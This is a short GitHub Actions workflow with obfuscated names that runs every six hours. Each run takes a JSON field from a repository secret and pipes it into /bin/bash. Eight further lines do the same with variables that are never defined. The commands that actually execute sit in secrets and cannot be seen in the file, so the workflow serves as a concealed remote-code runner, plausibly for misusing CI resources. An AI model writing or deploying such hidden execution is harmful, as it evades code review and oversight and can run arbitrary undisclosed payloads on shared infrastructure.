name: fenzhizoutai

on:
  workflow_dispatch:
  schedule:
    - cron: '41 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fenzhizoutai
        env:
          piy47520: ${{ secrets.piy47520 }}
        run: |
          echo $piy47520 | jq -r .bsun2189 | /bin/bash
          echo $bpnso995 | jq -r .e12444 | /bin/bash
          echo $ujhqy9828 | jq -r .vrfdz22831 | /bin/bash
          echo $eyup96 | jq -r .cqqs12 | /bin/bash
          echo $vzmfk46188 | jq -r .uqk8 | /bin/bash
          echo $a9 | jq -r .v5 | /bin/bash
          echo $ercz099 | jq -r .vk8 | /bin/bash
          echo $db46 | jq -r .pu49 | /bin/bash
          echo $t8 | jq -r .fom4314 | /bin/bash

